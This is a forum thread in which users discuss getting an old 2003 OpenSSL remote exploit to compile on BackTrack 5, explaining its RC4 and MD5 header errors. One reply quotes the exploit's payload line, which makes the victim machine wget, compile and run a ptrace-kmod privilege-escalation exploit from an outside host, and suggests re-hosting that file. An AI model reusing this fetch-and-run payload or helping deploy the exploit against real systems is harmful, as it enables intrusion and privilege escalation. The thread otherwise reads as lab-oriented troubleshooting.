Hi jinwald12,

First of all I don't think anyone will help you with this. If you are not sure how to compile something and don't understand how it works then you should not really be running it. Most security experts will not tell anyone how to run an exploit because you might be using it for unethical reasons.

The best advice I can really give you is take a look at GCC and try work it out yourself. Or maybe try thinking outside the box see if you can come up with another way in. Remember sometimes the most simplest things can work.

and since i first posted i learned that i need to use the -I directive to specify a external library so now i just need to know what version of OpenSSL it depends on and where i can get it

Analysing the code in detail and the errors when trying to compile the code will help you. The exploit is pretty old (2003) too which will might cause compilation errors when compiling on systems that have updated code such as OpenSSL. When you try and compile the code on BT5 you probably had the errors listed below:

error: expected specifier-qualifier-list before ‘RC4_KEY’
In function ‘ssl_connect_host’:
error: ‘ssl_conn’ has no member named ‘encrypted’

and: error: ‘MD5_DIGEST_LENGTH’ undeclared (first use in this function)

The first error that mentions RC4_KEY indicates that the exploit code includes RC4 commands but the exploit code has missing RC4 header defined in the code.

Further down in the code you see instructions for:
/* session keys */
    unsigned char* read_key;
    unsigned char* write_key;
    RC4_KEY* rc4_read_key;
    RC4_KEY* rc4_write_key;

and further down in the code:

MD5_Init(&ctx);
        MD5_Update(&ctx, ssl->write_key, RC4_KEY_LENGTH);
        MD5_Update(&ctx, rec, rec_len);
        MD5_Update(&ctx, &seq, 4);
        MD5_Final(p, &ctx);


Additional info: http://www.openssl.org/docs/crypto/rc4.html
http://www.openssl.org/docs/crypto/md5.html

The exploit also downloads another exploit ptrace-kmod.c from the victim machine and compiles it locally:

wget http://packetstormsecurity.nl/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c;

That URL listed above is no longer valid, but the exploit code is still available at various locations, for example: http://downloads.securityfocus.com/vulnerabilities/exploits/ptrace-kmod.c
You can download the ptrace-kmod.c exploit locally on your BT5 machine and then host the file using Apache, you would need to modify the exploit code to reflect this though in the wget line. Using the securityfocus URL assumes the following: the victim machine can connect to that URL and also assumes that gcc is installed so that the ptrace-kmod.c exploit can be compiled once downloaded.

If you modify the exploit code as follows, it should compile fine on BT5, make sure that you have installed the development libraries for SSL (apt-get install libssl-dev) only changes are listed:

Let me know if this works for you or if you have any questions.

Good luck!  

PS. tested on both Backtrack 4 and 5

Just had a look at that exploit code and dam thats alot of code O_0 looks so confusing, what language is it